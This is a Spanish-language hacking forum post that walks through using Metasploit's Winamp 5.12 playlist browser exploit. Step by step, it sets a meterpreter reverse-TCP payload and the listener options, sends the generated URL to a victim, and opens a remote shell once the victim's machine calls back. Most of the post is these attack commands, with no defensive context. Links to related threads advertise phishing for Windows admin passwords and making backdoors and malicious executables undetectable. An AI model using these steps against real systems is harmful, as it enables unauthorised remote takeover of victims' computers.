Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Metasploit] Vulnerabilidad Winamp 5.12

  • 0 Respuestas
  • 1746 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado LucaSthefano

  • *
  • Underc0der
  • Mensajes: 399
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Julio 20, 2011, 01:58:25 am »
Buenas, estuve revisando la lista de exploits para Navegadores (Browser) de Windows.
Cuando me tope con una de Winamp con lo que me decidí a probarla..

Vamos que es así:
Con el siguiente código usamos el Exploit
Código: [Seleccionar]
use exploit/windows/browser/winamp_playlist_unc
Seleccionamos nuestro Payload de Reversa
Código: [Seleccionar]
set payload windows/meterpreter/reverse_tcp
Acá seteamos nuestra IP localhost
Código: [Seleccionar]
set LHOST
Acá la IP del Server (Nuestra IP)
Código: [Seleccionar]
set SRVHOST
Con este seleccionamos el PUERTO de escucha
Código: [Seleccionar]
set SRVPORT
Finalmente lanzamos el Exploit
Código: [Seleccionar]
exploit
Nos generará una URL la cual debemos pasar al REMOTO, al abrirla si tiene Winamp, se le abrirá automáticamente con este y le dará un mensaje acerca de su lista de reproducción.

A nosotros en la Consola nos llegará un mensaje de una sesión del Meterpreter abierta..
Verificamos la sesión con el comando
Código: [Seleccionar]
sessions

Viendo que en mi caso hay 1 sesión la llamo con
Código: [Seleccionar]
sessions -i 1
Nos llegara el mensaje del meterpreter y con esto ya podríamos llamar la shell remota
Código: [Seleccionar]
shell
Hasta aquí llegamos..

Autor: Kodeinfect
Fuente: Foro Portal Hacker
« Última modificación: Agosto 08, 2014, 08:41:55 pm por Expermicid »

 

¿Te gustó el post? COMPARTILO!



"Escaneo Invisible" con NMAP y Metasploit

Iniciado por Stiuvert

Respuestas: 3
Vistas: 7314
Último mensaje Junio 21, 2013, 09:33:46 pm
por GhostFire
Obtener contraseña (admin) de windows con metasploit usando el módulo phish_windows_credentials

Iniciado por LionSec

Respuestas: 8
Vistas: 3472
Último mensaje Mayo 25, 2015, 02:49:25 pm
por MagoAstral
Metasploit + Metasm (Ghost Writing ASM) para crear un backdoor indetectable

Iniciado por Aryenal.Bt

Respuestas: 11
Vistas: 6098
Último mensaje Noviembre 20, 2012, 12:25:34 am
por BCKTR1X
MITM / Man in the middle - Ettercap + MITMF + Beef Exploiting + Metasploit

Iniciado por BrowserNet

Respuestas: 8
Vistas: 6341
Último mensaje Abril 05, 2017, 01:37:02 am
por puntoCL
Metasploit + Hyperion (PE Crypter) para la indetección de ejecutables maliciosos

Iniciado por Aryenal.Bt

Respuestas: 12
Vistas: 5581
Último mensaje Octubre 18, 2014, 10:17:55 am
por Snifer